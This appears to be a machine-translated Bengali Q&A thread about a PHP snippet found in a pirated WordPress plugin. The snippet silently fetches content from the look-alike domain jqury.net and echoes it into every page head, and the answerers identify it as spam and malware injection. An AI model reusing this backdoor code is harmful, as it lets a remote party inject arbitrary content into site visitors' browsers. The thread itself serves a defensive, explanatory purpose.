আমি এটি একটি প্লাগইনে পেয়েছি। এটার কাজ কি? এটা কি বিপদজনক?

17

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

— সোফিয়া গোলাপ
সূত্র

5

এটি কোন প্লাগইন?

— ড্যানিয়েল

আপনি অফিশিয়াল ডাব্লুপি সাইট থেকে প্লাগইনটি পেয়েছেন?

— ব্রাজিলিয়ান গাই

1

এটি একটি প্লাগইনে ছিল আমার এক গ্রাহক আমাকে আমার নেটওয়ার্ক ইনস্টল চালানোর জন্য চেয়েছিলেন। প্লাগইন এটি ডাব্লুপি-অ্যাডমিনে চালাতে চেয়েছিল। এটি পড়ার পরে আমি তাকে জিজ্ঞাসা করলাম এটি কোথা থেকে এসেছে। এটি একটি টরেন্ট থেকে একটি নীল প্লাগইন। সংক্ষিপ্ত উত্তরটি ছিল কোনও উত্তর xXx

— সোফিয়া রোজ

16

এটি স্প্যামযুক্ত মার্কআপের একটি ব্লক লোড করে (আমি উত্সটি কিছুটা পোস্ট করার কথা ভেবেছিলাম তবে আমি কোনও উপায়ে বিজ্ঞাপনটি প্রকাশ করতে চাই না) এমন একটি ডোমেন যা ডোমেনটির একদম ভুল বানান http://jquery.com/- - jQuery দ্বারা ব্যবহৃত , একটি নামী এবং জনপ্রিয় জাভাস্ক্রিপ্ট লাইব্রেরি এবং একটি ওয়ার্ডপ্রেস কোর অন্তর্ভুক্ত। আমি মনে করি ধারণাটি সেই লাইব্রেরিটি লোড করা হবে বলে মনে হচ্ছে, যখন বাস্তবে খুব আলাদা কিছু লোড হচ্ছে।

এবং এটি অন্যান্য উপায়ে jQuery লোড হচ্ছে বলে মনে করার চেষ্টা করছে। ভেরিয়েবলের নামটি লক্ষ্য করুন $jquery।

এটি পাশাপাশি দূষিত স্ক্রিপ্টগুলি লোড করার চেষ্টা করতে পারে। আমি চেক করিনি। আমি চাই স্পষ্টভাবে এটা বিপজ্জনক যে পৃষ্ঠার সামগ্রী যে কোন সময় ডোমেইন কন্ট্রোলার এটা মত মনে পরিবর্তন করতে পারেন বিশেষ করে কল করুন।

সর্বোপরি এটি আপনার সাইটের ক্ষতি করতে চলেছে কারণ স্প্যাম ছড়িয়ে থাকা সাইটগুলিতে সার্চ ইঞ্জিনগুলি নীচে তাকিয়ে রয়েছে।

এটি ব্যবহার করবেন না। এটি সাইট চালানো লোকদের ব্যতীত আপনার বা ওয়েবে অন্য কারও পক্ষে উপকারী কিছুই করে না। যদি এটি কোনও নামী সাইটটিতে পাওয়া যায় তবে তাদের কাছে এটি রিপোর্ট করুন।

— s_ha_dum
সূত্র

7

হ্যাঁ, এটি বিপজ্জনক কোড, স্প্যাম সাইট থেকে সামগ্রী লোড করা।

আপনি প্লাগইনটির নাম রাখেন নি, তবে আপনার ওয়েবসাইটটিতে ইনস্টল হওয়ার পরে যদি আপনি এই কোডটি খুঁজে পান তবে এটি সম্ভবত বিকাশকারীদের কাছ থেকে প্লাগইন কোডটি না আসে, তবে এটি ইনস্টল হওয়ার পরে হ্যাক হয়ে যায়। যদি এটি হয় তবে আপনার ওয়েবসাইটটিতে কেবলমাত্র এই প্লাগইনটির চেয়ে আপনি দূষিত কোডটি খুঁজে পেতে পারেন।

আপনি যেখানেই প্লাগইনটি মূলত পেয়েছেন সেখান থেকে ডাউনলোড প্লাগইন কোডটি পরীক্ষা করে দেখুন এবং দেখুন যে এই দূষিত কোডটি মূলত সেখানে ছিল কিনা। যদি তা না হয় তবে আপনার সাইটটি হ্যাক হয়ে গেছে। যদি আপনি এটি কেস হিসাবে নির্ধারণ করেন তবে কোডেক্স থেকে এই নিবন্ধটি পড়ুন ।

— বেন মিলার - মনিকা পুনরায় স্থাপন করুন
সূত্র

3

এটি একটি প্লাগইনে ছিল আমার এক গ্রাহক আমাকে আমার নেটওয়ার্ক ইনস্টল চালানোর জন্য চেয়েছিলেন। প্লাগইন এটি ডাব্লুপি-অ্যাডমিনে চালাতে চেয়েছিল। এটি পড়ার পরে আমি তাকে জিজ্ঞাসা করলাম এটি কোথা থেকে এসেছে। এটি একটি টরেন্ট থেকে একটি নীল প্লাগইন। সংক্ষিপ্ত উত্তরটি ছিল কোনও

— সোফিয়া রোজ